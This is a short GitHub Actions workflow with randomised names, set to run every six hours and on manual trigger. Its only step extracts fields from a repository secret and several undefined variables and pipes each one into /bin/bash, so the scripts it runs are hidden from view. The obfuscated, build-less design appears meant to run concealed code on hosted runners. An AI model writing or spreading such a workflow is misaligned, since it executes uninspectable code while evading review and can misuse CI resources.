name: tongsuishi1238

on:
  workflow_dispatch:
  schedule:
    - cron: '13 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tongsuishi1238
        env:
          im5200: ${{ secrets.im5200 }}
        run: |
          echo $im5200 | jq -r .gys07363 | /bin/bash
          echo $amxv16 | jq -r .ssoz5 | /bin/bash
          echo $bja68748 | jq -r .qy8969 | /bin/bash
          echo $h7 | jq -r .bqbd9405 | /bin/bash
          echo $f21845 | jq -r .lcvai2351 | /bin/bash
          echo $v198 | jq -r .tfyeq2010 | /bin/bash
          echo $up584 | jq -r .ld1024 | /bin/bash
          echo $svsyb3700 | jq -r .kz4411 | /bin/bash

